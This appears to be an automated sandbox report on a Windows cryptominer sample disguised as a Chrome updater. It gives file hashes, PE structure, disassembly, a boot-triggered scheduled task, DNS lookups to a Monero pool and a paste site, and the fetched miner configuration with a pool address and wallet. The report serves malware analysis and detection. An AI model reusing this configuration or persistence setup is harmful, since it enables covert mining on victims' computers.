                                                                                                                          Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......H.- ..Cs..Cs..CsG.@r..CsG.Fr..CsG.Gr..Cs...s..Cs..Gr..Cs..Frf.Cs..@r..Cs:.Gr..Cs..Bs..CsG.Br..Cs..Gr_.Cs:.Jr..Cs:.@r..Cs:..s..Cs...s..Cs:.Ar..CsRich..Cs................PE..d....r.d.........."....%.l;...D......7........@..........................................`..................................................CR...............}.D............ ..x.....N.......................N.(...@.N.@.............;.8............................text....k;......l;................. ..`.rdata........;......p;.............@..@.data.....+..pR......ZR.............@....pdata..D.....}......dS.............@..@_RANDOMX.............nU.............@..`_TEXT_CN.&.......(...|U.............@..`_TEXT_CN..............U.............@..`_RDATA..\.............U.............@..@.rsrc.................U.............@..@.reloc..x.... ........U.............@..B........................................
                                                                                                                          Process:C:\Program Files\Google\Chrome\updater.exe
                                                                                                                          File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):14544
                                                                                                                          Entropy (8bit):6.2660301556221185
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                                                                                          MD5:0C0195C48B6B8582FA6F6373032118DA
                                                                                                                          SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                                                                                          SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                                                                                          SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Program Files\Google\Chrome\updater.exe
                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1490
                                                                                                                          Entropy (8bit):5.1015990235428035
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:2dk4+SkIMFWYL60YeGlMhEMjn5pwjpILUYODOLqx49RJh7h8gJ15E15LNEB86tn:cC3IQDL60uydbQ9IIYODOLqOdq2sbEx
                                                                                                                          MD5:546D67A48FF2BF7682CEA9FAC07B942E
                                                                                                                          SHA1:A2CB3A9A97FD935B5E62D4C29B3E2C5AB7D5FC90
                                                                                                                          SHA-256:EFF7EDC19E6C430AAECA7EA8A77251C74D1E9ABB79B183A9EE1F58C2934B4B6A
                                                                                                                          SHA-512:10D90EDF31C0955BCEC52219D854952FD38768BD97E8E50D32A1237BCCAF1A5EB9F824DA0F81A7812E0CE62C0464168DD0201D1C0EB61B9FE253FE7C89DE05FE
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <Triggers>.. <BootTrigger>.. . <Enabled>true</Enabled>.. </BootTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">... <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <Duration>PT10M</Duration>.. <WaitTimeout>PT1H</WaitTimeout>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabl
                                                                                                                          File type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                          Entropy (8bit):7.664425949989934
                                                                                                                          TrID:
                                                                                                                          • Win64 Executable (generic) (12005/4) 74.95%
                                                                                                                          • Generic Win/DOS Executable (2004/3) 12.51%
                                                                                                                          • DOS Executable Generic (2002/1) 12.50%
                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
                                                                                                                          File name:hiwA7Blv7C.exe
                                                                                                                          File size:5'925'152 bytes
                                                                                                                          MD5:7bf019893eb8df6fc169e8f9ef5269c6
                                                                                                                          SHA1:41fcc57f71768d9df534632d3d7c52138d59e3e1
                                                                                                                          SHA256:882b403dcc4c6928de9d4a86bf4fbb650909485e828cba37258d68be81340739
                                                                                                                          SHA512:280ee6d446b1261ac2a5ecdc1ecc30daa073ebfb4fc6864040ca4ad23d89ff2d912528df56cfa2cde9012aa6ddb60108beb60982dbf710d2670aba7e90a99352
                                                                                                                          SSDEEP:98304:iOKxam2uqpBZuVEqrPb/1wLpH6zjH5O8MJcZycvM+PvwwDqxmzN2TP4q:znvPZuVEqrPb/1YyZkJR+PYwmwS4q
                                                                                                                          TLSH:AA56D0B98CE2587CC1274175DE10A4FB90177A4625AB7A1C8EE874A0CE257F96CC3F63
                                                                                                                          File Content Preview:MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d......................(.P...<Z................@..............................Z.......Z...`... ............................
                                                                                                                          Icon Hash:00928e8e8686b000
                                                                                                                          Entrypoint:0x1400012fd
                                                                                                                          Entrypoint Section:.text
                                                                                                                          Digitally signed:true
                                                                                                                          Imagebase:0x140000000
                                                                                                                          Subsystem:windows gui
                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
                                                                                                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                                                                                                                          Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                                                                                          TLS Callbacks:0x400032bc, 0x1, 0x400032a0, 0x1
                                                                                                                          CLR (.Net) Version:
                                                                                                                          OS Version Major:4
                                                                                                                          OS Version Minor:0
                                                                                                                          File Version Major:4
                                                                                                                          File Version Minor:0
                                                                                                                          Subsystem Version Major:4
                                                                                                                          Subsystem Version Minor:0
                                                                                                                          Import Hash:0bef0699ef655f5fd487ba3445b72f61
                                                                                                                          Signature Valid:false
                                                                                                                          Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                                                          Signature Validation Error:The digital signature of the object did not verify
                                                                                                                          Error Number:-2146869232
                                                                                                                          Not Before, Not After
                                                                                                                          • 02/07/2021 02:00:00 11/07/2024 01:59:59
                                                                                                                          Subject Chain
                                                                                                                          • CN=Google LLC, O=Google LLC, L=Mountain View, S=California, C=US
                                                                                                                          Version:3
                                                                                                                          Thumbprint MD5:DC429A22AA63D23DB8E84F53D05D1D48
                                                                                                                          Thumbprint SHA-1:2673EA6CC23BEFFDA49AC715B121544098A1284C
                                                                                                                          Thumbprint SHA-256:7D3D117664F121E592EF897973EF9C159150E3D736326E9CD2755F71E0FEBC0C
                                                                                                                          Serial:0E4418E2DEDE36DD2974C3443AFB5CE5
                                                                                                                          Instruction
                                                                                                                          dec eax
                                                                                                                          sub esp, 28h
                                                                                                                          dec eax
                                                                                                                          mov eax, dword ptr [005A2308h]
                                                                                                                          mov dword ptr [eax], 00000001h
                                                                                                                          call 00007FAADCCCBC23h
                                                                                                                          nop
                                                                                                                          nop
                                                                                                                          dec eax
                                                                                                                          add esp, 28h
                                                                                                                          ret
                                                                                                                          dec eax
                                                                                                                          sub esp, 28h
                                                                                                                          dec eax
                                                                                                                          mov eax, dword ptr [005A22EBh]
                                                                                                                          xor edx, edx
                                                                                                                          mov dword ptr [eax], edx
                                                                                                                          call 00007FAADCCCBC08h
                                                                                                                          nop
                                                                                                                          nop
                                                                                                                          dec eax
                                                                                                                          add esp, 28h
                                                                                                                          ret
                                                                                                                          dec eax
                                                                                                                          sub esp, 28h
                                                                                                                          call 00007FAADCCCE9C7h
                                                                                                                          dec eax
                                                                                                                          cmp eax, 01h
                                                                                                                          sbb eax, eax
                                                                                                                          dec eax
                                                                                                                          add esp, 28h
                                                                                                                          ret
                                                                                                                          nop
                                                                                                                          nop
                                                                                                                          nop
                                                                                                                          nop
                                                                                                                          nop
                                                                                                                          nop
                                                                                                                          nop
                                                                                                                          dec eax
                                                                                                                          lea ecx, dword ptr [00000005h]
                                                                                                                          jmp 00007FAADCCCBDDEh
                                                                                                                          ret
                                                                                                                          nop
                                                                                                                          nop
                                                                                                                          nop
                                                                                                                          ret
                                                                                                                          ret
                                                                                                                          ret
                                                                                                                          ret
                                                                                                                          ret
                                                                                                                          ret
                                                                                                                          ret
                                                                                                                          ret
                                                                                                                          ret
                                                                                                                          ret
                                                                                                                          ret
                                                                                                                          ret
                                                                                                                          ret
                                                                                                                          ret
                                                                                                                          ret
                                                                                                                          ret
                                                                                                                          ret
                                                                                                                          ret
                                                                                                                          ret
                                                                                                                          ret
                                                                                                                          ret
                                                                                                                          ret
                                                                                                                          ret
                                                                                                                          ret
                                                                                                                          ret
                                                                                                                          ret
                                                                                                                          ret
                                                                                                                          ret
                                                                                                                          ret
                                                                                                                          ret
                                                                                                                          ret
                                                                                                                          ret
                                                                                                                          ret
                                                                                                                          ret
                                                                                                                          ret
                                                                                                                          ret
                                                                                                                          ret
                                                                                                                          ret
                                                                                                                          ret
                                                                                                                          ret
                                                                                                                          ret
                                                                                                                          ret
                                                                                                                          ret
                                                                                                                          inc ecx
                                                                                                                          push edi
                                                                                                                          inc ecx
                                                                                                                          push esi
                                                                                                                          inc ecx
                                                                                                                          push ebp
                                                                                                                          inc ecx
                                                                                                                          push esp
                                                                                                                          push ebp
                                                                                                                          push edi
                                                                                                                          push esi
                                                                                                                          push ebx
                                                                                                                          dec eax
                                                                                                                          sub esp, 48h
                                                                                                                          dec esp
                                                                                                                          mov esp, dword ptr [esp+000000B0h]
                                                                                                                          dec esp
                                                                                                                          mov ebp, dword ptr [esp+000000B8h]
                                                                                                                          dec esp
                                                                                                                          mov edi, dword ptr [esp+000000C0h]
                                                                                                                          dec esp
                                                                                                                          mov esi, dword ptr [esp+000000C8h]
                                                                                                                          dec eax
                                                                                                                          mov edi, ecx
                                                                                                                          dec eax
                                                                                                                          mov ecx, edx
                                                                                                                          dec esp
                                                                                                                          mov ebx, eax
                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x5a80000x600.idata
                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x5ab0000x388.rsrc
                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x5a40000x624.pdata
                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x5a40000x2920
                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x5ac0000x78.reloc
                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x5a32800x28.rdata
                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x5a81a00x160.idata
                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                          .text0x10000x4fa80x5000a62f38d5cd24be0d35d32d11d1b2ff4cFalse0.564599609375data6.2682042214234075IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                          .data0x60000x59b0800x59b200b8d75992b46d00b4976920de88a59bf1unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                          .rdata0x5a20000x1b200x1c00818cf70b81476710bb2803d2617b6ffbFalse0.42982700892857145data4.543735601281149IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                          .pdata0x5a40000x6240x80036489e9ddd9e8a030b9ea99cdbcd33d9False0.34423828125data3.709101691642188IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                          .xdata0x5a50000x4480x600daeb69e5899810be08de821c316bb5e7False0.2526041666666667data3.047516790704977IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                          .bss0x5a60000x18600x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                          .idata0x5a80000x6000x600ee456c3879aa465e41b58434a90eb578False0.369140625data4.149318836636945IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                          .CRT0x5a90000x600x2003c1f383e579a1bb4f38759caba324c9aFalse0.06640625data0.27950974526108024IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                          .tls0x5aa0000x100x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                          .rsrc0x5ab0000x3880x400fd865177d35e778ae6783d215a70b0caFalse0.4521484375data5.023865484975868IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                          .reloc0x5ac0000x780x20003879146f72267310b9358bcf48631f7False0.24609375data1.481711020080349IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                          RT_MANIFEST0x5ab0580x330XML 1.0 document, ASCII textEnglishUnited States0.508578431372549
                                                                                                                          DLLImport
                                                                                                                          KERNEL32.dllDeleteCriticalSection, EnterCriticalSection, GetLastError, InitializeCriticalSection, LeaveCriticalSection, SetUnhandledExceptionFilter, Sleep, TlsGetValue, VirtualProtect, VirtualQuery
                                                                                                                          msvcrt.dll__C_specific_handler, __getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _amsg_exit, _cexit, _commode, _fmode, _initterm, _onexit, abort, calloc, exit, fprintf, fputs, free, malloc, signal, strcat, strlen, strncmp, strstr, vfprintf, wcscat, wcscpy, wcslen, wcsncmp, wcsstr, _wcsnicmp, _wcsicmp
                                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                                          EnglishUnited States
                                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                          2025-01-02T23:26:04.974237+01002054247ET MALWARE SilentCryptoMiner Agent Config Inbound1172.67.19.24443192.168.2.649701TCP
                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                          Jan 2, 2025 23:26:02.901072979 CET4970010343192.168.2.654.37.137.114
                                                                                                                          Jan 2, 2025 23:26:02.905898094 CET103434970054.37.137.114192.168.2.6
                                                                                                                          Jan 2, 2025 23:26:02.906102896 CET4970010343192.168.2.654.37.137.114
                                                                                                                          Jan 2, 2025 23:26:02.906488895 CET4970010343192.168.2.654.37.137.114
                                                                                                                          Jan 2, 2025 23:26:02.911252022 CET103434970054.37.137.114192.168.2.6
                                                                                                                          Jan 2, 2025 23:26:03.546416998 CET103434970054.37.137.114192.168.2.6
                                                                                                                          Jan 2, 2025 23:26:03.546433926 CET103434970054.37.137.114192.168.2.6
                                                                                                                          Jan 2, 2025 23:26:03.547832966 CET4970010343192.168.2.654.37.137.114
                                                                                                                          Jan 2, 2025 23:26:03.547832966 CET4970010343192.168.2.654.37.137.114
                                                                                                                          Jan 2, 2025 23:26:03.552639961 CET103434970054.37.137.114192.168.2.6
                                                                                                                          Jan 2, 2025 23:26:03.739054918 CET103434970054.37.137.114192.168.2.6
                                                                                                                          Jan 2, 2025 23:26:03.791413069 CET4970010343192.168.2.654.37.137.114
                                                                                                                          Jan 2, 2025 23:26:03.866161108 CET103434970054.37.137.114192.168.2.6
                                                                                                                          Jan 2, 2025 23:26:03.916423082 CET4970010343192.168.2.654.37.137.114
                                                                                                                          Jan 2, 2025 23:26:03.950306892 CET49701443192.168.2.6172.67.19.24
                                                                                                                          Jan 2, 2025 23:26:03.950329065 CET44349701172.67.19.24192.168.2.6
                                                                                                                          Jan 2, 2025 23:26:03.950673103 CET49701443192.168.2.6172.67.19.24
                                                                                                                          Jan 2, 2025 23:26:03.964618921 CET49701443192.168.2.6172.67.19.24
                                                                                                                          Jan 2, 2025 23:26:03.964638948 CET44349701172.67.19.24192.168.2.6
                                                                                                                          Jan 2, 2025 23:26:03.984087944 CET103434970054.37.137.114192.168.2.6
                                                                                                                          Jan 2, 2025 23:26:04.025795937 CET4970010343192.168.2.654.37.137.114
                                                                                                                          Jan 2, 2025 23:26:04.433032990 CET44349701172.67.19.24192.168.2.6
                                                                                                                          Jan 2, 2025 23:26:04.434703112 CET49701443192.168.2.6172.67.19.24
                                                                                                                          Jan 2, 2025 23:26:04.434716940 CET44349701172.67.19.24192.168.2.6
                                                                                                                          Jan 2, 2025 23:26:04.435959101 CET44349701172.67.19.24192.168.2.6
                                                                                                                          Jan 2, 2025 23:26:04.436043024 CET49701443192.168.2.6172.67.19.24
                                                                                                                          Jan 2, 2025 23:26:04.438218117 CET49701443192.168.2.6172.67.19.24
                                                                                                                          Jan 2, 2025 23:26:04.438285112 CET44349701172.67.19.24192.168.2.6
                                                                                                                          Jan 2, 2025 23:26:04.438461065 CET49701443192.168.2.6172.67.19.24
                                                                                                                          Jan 2, 2025 23:26:04.438476086 CET44349701172.67.19.24192.168.2.6
                                                                                                                          Jan 2, 2025 23:26:04.478916883 CET49701443192.168.2.6172.67.19.24
                                                                                                                          Jan 2, 2025 23:26:04.974041939 CET44349701172.67.19.24192.168.2.6
                                                                                                                          Jan 2, 2025 23:26:04.974126101 CET44349701172.67.19.24192.168.2.6
                                                                                                                          Jan 2, 2025 23:26:04.974208117 CET49701443192.168.2.6172.67.19.24
                                                                                                                          Jan 2, 2025 23:26:04.979269981 CET49701443192.168.2.6172.67.19.24
                                                                                                                          Jan 2, 2025 23:26:04.979295015 CET44349701172.67.19.24192.168.2.6
                                                                                                                          Jan 2, 2025 23:26:04.981048107 CET4970010343192.168.2.654.37.137.114
                                                                                                                          Jan 2, 2025 23:26:04.981084108 CET4970010343192.168.2.654.37.137.114
                                                                                                                          Jan 2, 2025 23:26:04.981585979 CET4970310343192.168.2.651.15.58.224
                                                                                                                          Jan 2, 2025 23:26:04.987406015 CET103434970351.15.58.224192.168.2.6
                                                                                                                          Jan 2, 2025 23:26:04.987493992 CET4970310343192.168.2.651.15.58.224
                                                                                                                          Jan 2, 2025 23:26:05.025126934 CET4970310343192.168.2.651.15.58.224
                                                                                                                          Jan 2, 2025 23:26:05.030843019 CET103434970351.15.58.224192.168.2.6
                                                                                                                          Jan 2, 2025 23:26:05.585097075 CET103434970351.15.58.224192.168.2.6
                                                                                                                          Jan 2, 2025 23:26:05.585113049 CET103434970351.15.58.224192.168.2.6
                                                                                                                          Jan 2, 2025 23:26:05.585861921 CET4970310343192.168.2.651.15.58.224
                                                                                                                          Jan 2, 2025 23:26:05.585861921 CET4970310343192.168.2.651.15.58.224
                                                                                                                          Jan 2, 2025 23:26:05.590666056 CET103434970351.15.58.224192.168.2.6
                                                                                                                          Jan 2, 2025 23:26:05.756432056 CET103434970351.15.58.224192.168.2.6
                                                                                                                          Jan 2, 2025 23:26:05.807183981 CET4970310343192.168.2.651.15.58.224
                                                                                                                          Jan 2, 2025 23:26:05.889571905 CET103434970351.15.58.224192.168.2.6
                                                                                                                          Jan 2, 2025 23:26:05.933927059 CET4970310343192.168.2.651.15.58.224
                                                                                                                          Jan 2, 2025 23:26:14.165816069 CET103434970351.15.58.224192.168.2.6
                                                                                                                          Jan 2, 2025 23:26:14.291431904 CET4970310343192.168.2.651.15.58.224
                                                                                                                          Jan 2, 2025 23:26:24.096678972 CET103434970351.15.58.224192.168.2.6
                                                                                                                          Jan 2, 2025 23:26:24.291552067 CET4970310343192.168.2.651.15.58.224
                                                                                                                          Jan 2, 2025 23:26:38.093383074 CET103434970351.15.58.224192.168.2.6
                                                                                                                          Jan 2, 2025 23:26:38.291538954 CET4970310343192.168.2.651.15.58.224
                                                                                                                          Jan 2, 2025 23:26:48.129981995 CET103434970351.15.58.224192.168.2.6
                                                                                                                          Jan 2, 2025 23:26:48.171700954 CET4970310343192.168.2.651.15.58.224
                                                                                                                          Jan 2, 2025 23:27:00.095344067 CET103434970351.15.58.224192.168.2.6
                                                                                                                          Jan 2, 2025 23:27:00.135395050 CET4970310343192.168.2.651.15.58.224
                                                                                                                          Jan 2, 2025 23:27:10.089168072 CET103434970351.15.58.224192.168.2.6
                                                                                                                          Jan 2, 2025 23:27:10.260329962 CET4970310343192.168.2.651.15.58.224
                                                                                                                          Jan 2, 2025 23:27:20.155376911 CET103434970351.15.58.224192.168.2.6
                                                                                                                          Jan 2, 2025 23:27:20.369716883 CET4970310343192.168.2.651.15.58.224
                                                                                                                          Jan 2, 2025 23:27:30.348556995 CET103434970351.15.58.224192.168.2.6
                                                                                                                          Jan 2, 2025 23:27:30.572843075 CET4970310343192.168.2.651.15.58.224
                                                                                                                          Jan 2, 2025 23:27:41.100311041 CET103434970351.15.58.224192.168.2.6
                                                                                                                          Jan 2, 2025 23:27:41.260369062 CET4970310343192.168.2.651.15.58.224
                                                                                                                          Jan 2, 2025 23:27:51.146579981 CET103434970351.15.58.224192.168.2.6
                                                                                                                          Jan 2, 2025 23:27:51.260436058 CET4970310343192.168.2.651.15.58.224
                                                                                                                          Jan 2, 2025 23:28:01.184386015 CET103434970351.15.58.224192.168.2.6
                                                                                                                          Jan 2, 2025 23:28:01.232129097 CET4970310343192.168.2.651.15.58.224
                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                          Jan 2, 2025 23:26:02.888428926 CET5387653192.168.2.61.1.1.1
                                                                                                                          Jan 2, 2025 23:26:02.896998882 CET53538761.1.1.1192.168.2.6
                                                                                                                          Jan 2, 2025 23:26:03.942327976 CET6398853192.168.2.61.1.1.1
                                                                                                                          Jan 2, 2025 23:26:03.949212074 CET53639881.1.1.1192.168.2.6
                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                          Jan 2, 2025 23:26:02.888428926 CET192.168.2.61.1.1.10xbd09Standard query (0)xmr-eu1.nanopool.orgA (IP address)IN (0x0001)false
                                                                                                                          Jan 2, 2025 23:26:03.942327976 CET192.168.2.61.1.1.10xc059Standard query (0)pastebin.comA (IP address)IN (0x0001)false
                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                          Jan 2, 2025 23:26:02.896998882 CET1.1.1.1192.168.2.60xbd09No error (0)xmr-eu1.nanopool.org54.37.137.114A (IP address)IN (0x0001)false
                                                                                                                          Jan 2, 2025 23:26:02.896998882 CET1.1.1.1192.168.2.60xbd09No error (0)xmr-eu1.nanopool.org146.59.154.106A (IP address)IN (0x0001)false
                                                                                                                          Jan 2, 2025 23:26:02.896998882 CET1.1.1.1192.168.2.60xbd09No error (0)xmr-eu1.nanopool.org162.19.224.121A (IP address)IN (0x0001)false
                                                                                                                          Jan 2, 2025 23:26:02.896998882 CET1.1.1.1192.168.2.60xbd09No error (0)xmr-eu1.nanopool.org141.94.23.83A (IP address)IN (0x0001)false
                                                                                                                          Jan 2, 2025 23:26:02.896998882 CET1.1.1.1192.168.2.60xbd09No error (0)xmr-eu1.nanopool.org51.15.58.224A (IP address)IN (0x0001)false
                                                                                                                          Jan 2, 2025 23:26:02.896998882 CET1.1.1.1192.168.2.60xbd09No error (0)xmr-eu1.nanopool.org163.172.154.142A (IP address)IN (0x0001)false
                                                                                                                          Jan 2, 2025 23:26:02.896998882 CET1.1.1.1192.168.2.60xbd09No error (0)xmr-eu1.nanopool.org212.47.253.124A (IP address)IN (0x0001)false
                                                                                                                          Jan 2, 2025 23:26:02.896998882 CET1.1.1.1192.168.2.60xbd09No error (0)xmr-eu1.nanopool.org51.15.65.182A (IP address)IN (0x0001)false
                                                                                                                          Jan 2, 2025 23:26:02.896998882 CET1.1.1.1192.168.2.60xbd09No error (0)xmr-eu1.nanopool.org54.37.232.103A (IP address)IN (0x0001)false
                                                                                                                          Jan 2, 2025 23:26:02.896998882 CET1.1.1.1192.168.2.60xbd09No error (0)xmr-eu1.nanopool.org51.15.193.130A (IP address)IN (0x0001)false
                                                                                                                          Jan 2, 2025 23:26:02.896998882 CET1.1.1.1192.168.2.60xbd09No error (0)xmr-eu1.nanopool.org51.89.23.91A (IP address)IN (0x0001)false
                                                                                                                          Jan 2, 2025 23:26:03.949212074 CET1.1.1.1192.168.2.60xc059No error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                                                                                                                          Jan 2, 2025 23:26:03.949212074 CET1.1.1.1192.168.2.60xc059No error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                                                                                                                          Jan 2, 2025 23:26:03.949212074 CET1.1.1.1192.168.2.60xc059No error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                                                                                                                          • pastebin.com
                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          0192.168.2.649701172.67.19.244435536C:\Windows\System32\dialer.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-02 22:26:04 UTC114OUTGET /raw/mJdpKdhr HTTP/1.1
                                                                                                                          Accept: */*
                                                                                                                          Connection: close
                                                                                                                          Host: pastebin.com
                                                                                                                          User-Agent: cpp-httplib/0.12.6
                                                                                                                          2025-01-02 22:26:04 UTC391INHTTP/1.1 200 OK
                                                                                                                          Date: Thu, 02 Jan 2025 22:26:04 GMT
                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          x-frame-options: DENY
                                                                                                                          x-content-type-options: nosniff
                                                                                                                          x-xss-protection: 1;mode=block
                                                                                                                          cache-control: public, max-age=1801
                                                                                                                          CF-Cache-Status: EXPIRED
                                                                                                                          Last-Modified: Thu, 02 Jan 2025 22:26:04 GMT
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8fbe2b2a3ec7f5f6-EWR
                                                                                                                          2025-01-02 22:26:04 UTC483INData Raw: 31 64 63 0d 0a 7b 0d 0a 20 20 20 20 22 61 6c 67 6f 22 3a 20 22 72 78 2f 30 22 2c 0d 0a 20 20 20 20 22 70 6f 6f 6c 22 3a 20 22 78 6d 72 2d 65 75 31 2e 6e 61 6e 6f 70 6f 6f 6c 2e 6f 72 67 22 2c 0d 0a 20 20 20 20 22 70 6f 72 74 22 3a 20 31 30 33 34 33 2c 0d 0a 20 20 20 20 22 77 61 6c 6c 65 74 22 3a 20 22 34 42 42 6f 65 6e 75 39 4b 77 36 5a 6f 74 67 35 65 73 76 4d 58 50 32 33 38 62 76 55 74 47 69 73 47 63 61 51 37 56 53 4b 63 6b 76 53 4e 39 6f 76 5a 6b 52 6a 64 73 48 36 4a 31 62 32 55 76 6a 37 44 51 4a 34 71 66 6d 65 5a 64 69 78 72 67 36 73 73 70 38 70 72 32 59 38 37 43 55 4b 51 39 64 22 2c 0d 0a 20 20 20 20 22 70 61 73 73 77 6f 72 64 22 3a 20 22 22 2c 0d 0a 20 20 20 20 22 6e 69 63 65 68 61 73 68 22 3a 20 66 61 6c 73 65 2c 0d 0a 20 20 20 20 22 73 73 6c 74 6c
                                                                                                                          Data Ascii: 1dc{ "algo": "rx/0", "pool": "xmr-eu1.nanopool.org", "port": 10343, "wallet": "4BBoenu9Kw6Zotg5esvMXP238bvUtGisGcaQ7VSKckvSN9ovZkRjdsH6J1b2Uvj7DQJ4qfmeZdixrg6ssp8pr2Y87CUKQ9d", "password": "", "nicehash": false, "ssltl
                                                                                                                          2025-01-02 22:26:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


